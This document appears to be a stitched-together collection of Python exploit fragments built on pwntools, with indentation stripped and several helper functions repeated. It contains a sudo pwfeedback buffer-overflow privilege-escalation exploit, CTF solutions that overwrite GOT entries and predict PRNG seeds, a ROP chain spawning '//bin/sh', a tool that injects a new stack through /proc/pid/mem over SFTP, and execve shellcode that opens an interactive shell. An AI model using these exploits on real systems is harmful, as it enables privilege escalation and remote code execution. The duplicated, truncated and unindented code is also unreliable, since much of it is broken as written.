def exploit():
mfd, sfd = pty.openpty()
r = listen(12345)
process("sudo -S id < " + os.ttyname(sfd),
shell=True, env={"SUDO_ASKPASS": filename})
payload1 = "\x00" * OFFSETS[VERSION]
payload1 += p64(0xf4) # tgetpass_flags, 244
payload1 += p64(0) * 6 # user_details
payload1 += "\n"
payload = ""
for c in payload1:
payload += c
if (len(payload) + 1) % 0xf0 == 0: # 240
payload += "\x15" # sudo_term_kill char
sleep(1)
os.write(mfd, payload)
r.wait_for_connection()
# r.interactive()
r.sendline(b'id -a')
print("%s" % r.recvline(keepends=False))
print("%s" % r.recvline(keepends=False))
r.sendline(b'exit')
def run(self):
e = self.env
bits = e['bits']
chrs = e['chrs']
lock = e['lock']
disp = e['disp']
verify = e['verify']
s = ''
offset = 0
if disp:
log.waitfor('')
else:
log.waitfor('Running SQL query')
while not e['exit']:
sleep(0.1)
s1 = ''
if e['endp'] is not None:
l = e['endp']
else:
l = len(bits)
verified = True
newline = False
numb = 0
for i in range(offset, l // 8):
if i in chrs:
c, v = chrs[i]
if v: numb += 1
if c == '\n':
newline = True
break
if v:
s1 += c
else:
verified = False
s1 += text.red(c)
else:
verified = False
s1 += '.'
if s1 == s:
continue
s = s1
done = e[
'endp'] is not None and offset + numb == l // 8 and verified
if disp:
log.status(s)
if newline and verified or done:
offset += len(s1) + 1
if disp:
log.succeeded(s)
s = ''
if not done and disp:
log.waitfor('')
if done:
e['exit'] = True
if not disp:
log.succeeded()
def run(self):
global _marker
_trace('\x1b[?25l') # hide curser
while True:
if self.running:
self.update(True)
else:
break
self.i = (self.i + 1) % len(self.spinner)
pwn.sleep(0.1)
def run(self):
global _marker
_trace('\x1b[?25l') # hide curser
while True:
if self.running:
self.update(True)
else:
break
self.i = (self.i + 1) % len(self.spinner)
pwn.sleep(0.1)
def run(self):
e = self.env
bits = e['bits']
chrs = e['chrs']
lock = e['lock']
disp = e['disp']
verify = e['verify']
s = ''
offset = 0
if disp:
log.waitfor('')
else:
log.waitfor('Running SQL query')
while not e['exit']:
sleep(0.1)
s1 = ''
if e['endp'] is not None:
l = e['endp']
else:
l = len(bits)
verified = True
newline = False
numb = 0
for i in range(offset, l // 8):
if i in chrs:
c, v = chrs[i]
if v: numb += 1
if c == '\n':
newline = True
break
if v:
s1 += c
else:
verified = False
s1 += text.red(c)
else:
verified = False
s1 += '.'
if s1 == s:
continue
s = s1
done = e['endp'] is not None and offset + numb == l // 8 and verified
if disp:
log.status(s)
if newline and verified or done:
offset += len(s1) + 1
if disp:
log.succeeded(s)
s = ''
if not done and disp:
log.waitfor('')
if done:
e['exit'] = True
if not disp:
log.succeeded()
def splash():
log.trace('\x1b[G\x1b[?25l')
for c in range(8):
for line in _lines:
log.trace(color(c % 8, line) + '\n')
sleep(0.005)
for _ in _lines:
log.trace('\x1b[F')
for line in _lines:
log.trace(line + '\n')
log.trace('\x1b[?25h')
def splash():
"""Put this at the beginning of your exploit to create the illusion that your sploit is enterprisey and top notch quality"""
log.trace('\x1b[G\x1b[?25l')
for c in range(8):
for line in _lines:
log.trace(color(c % 8, line) + '\n')
sleep(0.005)
for _ in _lines:
log.trace('\x1b[F')
for line in _lines:
log.trace(line + '\n')
log.trace('\x1b[?25h')
def splash():
"""Put this at the beginning of your exploit to create the illusion that your sploit is enterprisey and top notch quality"""
log.trace('\x1b[G\x1b[?25l')
for c in range(8):
for line in _lines:
log.trace(color(c % 8, line) + '\n')
sleep(0.005)
for _ in _lines:
log.trace('\x1b[F')
for line in _lines:
log.trace(line + '\n')
log.trace('\x1b[?25h')
def pause(n = None):
"""Waits for either user input or a specific number of seconds."""
try:
if n is None:
log.info('Paused (press enter to continue)')
raw_input('')
else:
log.waitfor('Continueing in')
for i in range(n, 0, -1):
log.status('%d... ' % i)
pwn.sleep(1)
log.succeeded('Now')
except KeyboardInterrupt:
log.warning('Interrupted')
sys.exit(1)
def pause(n=None):
"""Waits for either user input or a specific number of seconds."""
try:
if n is None:
pwn.log.info('Paused (press enter to continue)')
raw_input('')
else:
pwn.log.waitfor('Continueing in')
for i in range(n, 0, -1):
pwn.log.status('%d... ' % i)
pwn.sleep(1)
pwn.log.succeeded('Now')
except KeyboardInterrupt:
pwn.log.warning('Interrupted')
sys.exit(1)
def main():
p = get_process()
user_name = 'A' * 8 + '\x05'
payload = 'login %s' % user_name
p.clean(timeout=0.5)
p.sendline(payload)
p.sendline('reset')
p.clean(timeout=0.5)
p.sendline('login root')
p.sendline('get-flag')
sleep(1)
print(p.recv(2048))
p.sendline('quit')
p.close()
def main():
p = remote(ExploitInfo.host, ExploitInfo.port)
exit_got = ExploitInfo.elf.got['exit']
win_addr = ExploitInfo.elf.sym['win']
log.info('GOT exit : 0x%x', exit_got)
log.info('ADDR win : 0x%x', win_addr)
p.clean()
p.sendline(hex(exit_got))
sleep(1)
p.sendline(hex(win_addr))
p.clean()
log.success("Rejoice me!")
p.sendline('ls -l')
p.interactive()
def exploit(self):
libc = ctypes.cdll.LoadLibrary(libc_name)
LONG_MAX = 2147483647
"""
roulette.c
"""
ROULETTE_SIZE = 36
ROULETTE_SPINS = 128
MAX_WINS = 16
HOTSTREAK = 3
s = 12500
q = 1.1
SLEEP_TIME_SPIN = Attack.calculate_sleep_time(s, q, ROULETTE_SIZE,
ROULETTE_SPINS)
with self.get_process(ld_preload=True) as self.p:
seed = self.get_seed()
libc.srand(seed)
log.info('seed: %r', seed)
choice = 1
for _ in xrange(HOTSTREAK):
balance = self.get_balance()
log.info('current balance: %r', balance)
wager = (libc.rand() % ROULETTE_SIZE) + 1
junk = libc.rand() # not send
self.send_bet_and_choice(str(0), str(wager))
log.info("sleep %r", SLEEP_TIME_SPIN)
sleep(SLEEP_TIME_SPIN)
for _ in xrange(HOTSTREAK + 1):
balance = self.get_balance()
log.info('current balance: %r', balance)
wager = (libc.rand() % ROULETTE_SIZE) + 1
junk = libc.rand() # not send
self.send_bet_and_choice(str(3994967295), str(1))
log.info("sleep %r", SLEEP_TIME_SPIN)
sleep(SLEEP_TIME_SPIN)
sleep(2)
print(self.p.recvall())
def f(n):
try:
while True:
sleep(0.001)
finally:
print 'EXIT', n
def f(n):
try:
while True:
sleep(0.001)
finally:
print 'EXIT', n
offset = 0x4b0f80
io.sendlineafter(" :", str(offset))
# gdb.attach(io, '''b *0x4b0f78\nc''')
data = asm('''
mov rsi, rsp
mov rdx, r12
pop rdi
syscall
ret
''').encode('hex')
print(len(data))
assert len(data) <= 20
io.sendlineafter(":", data)
sleep(0.01)
from struct import pack
p = lambda x: pack('Q', x)
IMAGE_BASE_0 = 0x0000000000400000 # 577e6f13d080302dd4c6e653134fee0234c7b4b4a9b03c849f6d0b176aa379b2
rebase_0 = lambda x: p(x + IMAGE_BASE_0)
rop = ''
rop += 'padding\0'
rop += rebase_0(0x0000000000020d7c) # 0x0000000000420d7c: pop r13; ret;
rop += '//bin/sh'
rop += rebase_0(0x0000000000020bb0) # 0x0000000000420bb0: pop r12; ret;
rop += rebase_0(0x00000000005b4ea0)
def main(shellcode, delta_stack, dct_args, libs_args, mode):
pid = dct_args['pid']
log.info('Analysing /proc/{}/maps on remote/local system'.format(pid))
path_to_maps = '/proc/{}/maps'.format(pid)
path_to_mem = '/proc/{}/mem'.format(pid)
if 'sftp' in dct_args:
sftp = dct_args['sftp']
sftp.get(path_to_maps, '/tmp/maps')
path_to_maps = '/tmp/maps'
f = open(path_to_maps, 'r')
lines = f.readlines()
f.close()
dct = Maps().gen_dct(lines, libs_args)
arch = dct['arch']
for lst in libs_args:
if lst[0] not in dct.keys():
log.warning('{} not found'.format(lst[0]))
sys.exit(0)
pathname = dct[lst[0]]['pathname']
if '[' not in pathname:
if 'sftp' in dct_args:
sftp.get(pathname, '/tmp/{}'.format(lst[0]))
dct[lst[0]]['filepath'] = '/tmp/{}'.format(lst[0])
else:
dct[lst[0]]['filepath'] = dct[lst[0]]['pathname']
e = ELF(dct['libc']['filepath'])
dct_addrs = {}
def add_addr(shift, bytes, name, comment='', shape=''):
try:
if shape == 'symbol':
addr = shift + e.symbols[bytes]
else:
addr = shift + next(e.search(bytes))
dct_addrs[name] = addr
print('[+] {} ; {}'.format(hex(addr), comment))
except:
print('[-] {} not found'.format(name))
shift_to_libc = int(dct['libc']['addr_start'], 16)
dct_addrs['stack_top_addr'] = int(dct['[stack]']['addr_start'], 16)
dct_addrs['stack_both_addr'] = int(dct['[stack]']['addr_end'], 16)
add_addr(shift_to_libc, b'mprotect', 'mprotect_addr', 'mprotect', 'symbol')
add_addr(shift_to_libc, b'execve', 'execve_addr', 'execve', 'symbol')
add_addr(shift_to_libc, b'\xc3', 'ret_addr', 'ret')
if arch == 32:
add_addr(shift_to_libc, b'\xcd\x80', 'int80h_addr', 'int 0x80')
add_addr(shift_to_libc, b'\x61\xc3', 'popa_ret_addr', 'popa; ret')
add_addr(shift_to_libc, b'\xff\xd6', 'call_esi_addr', 'call esi')
else:
add_addr(shift_to_libc, b'\x5f\xc3', 'pop_rdi', 'pop rdi; ret')
add_addr(shift_to_libc, b'\x5e\xc3', 'pop_rsi', 'pop rsi; ret')
add_addr(shift_to_libc, b'\x5a\xc3', 'pop_rdx', 'pop rdx; ret')
if 'sftp' in dct_args:
m = sftp.open(path_to_mem, 'w+b')
else:
m = open(path_to_mem, 'w+b')
if m.writable():
log.info('Good, \'r/w\' permissions for /proc/{}/mem'.format(pid))
else:
log.warning('Fatal error. No \'r/w\' permissions')
m.close()
sys.exit(0)
real_stack_size = dct_addrs['stack_both_addr'] - dct_addrs['stack_top_addr']
print('[+] real stack size: {}'.format(str(real_stack_size)))
stack_size = real_stack_size - delta_stack # new stack
print('[+] current stack size: {}'.format(str(stack_size)))
new_stack = stack(shellcode, stack_size, dct_addrs, arch, mode)
# write stack from start
m.seek(dct_addrs['stack_top_addr'])
log.info('Pushing new stack to {}'.format(hex(dct_addrs['stack_top_addr'])))
sleep(dct_args['sleep'])
try:
m.write(new_stack)
except paramiko.SSHException:
log.success('Excellent, the program dropped the connection')
sys.exit(0)
except paramiko.sftp.SFTPError:
log.success('Excellent, the program sent the garbage packet')
sys.exit(0)
log.info('Not bad, the program is working fine')
m.close()
sftp.close()
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
push rax
xor rdx, rdx
xor rsi, rsi
mov rbx, 0x0068732f6e69622f
push rbx
push rsp
pop rdi
mov al, 59
syscall
''')
rem.send(shellcode1)
pwn.sleep(1)
rem.send(shellcode2)
rem.interactive()
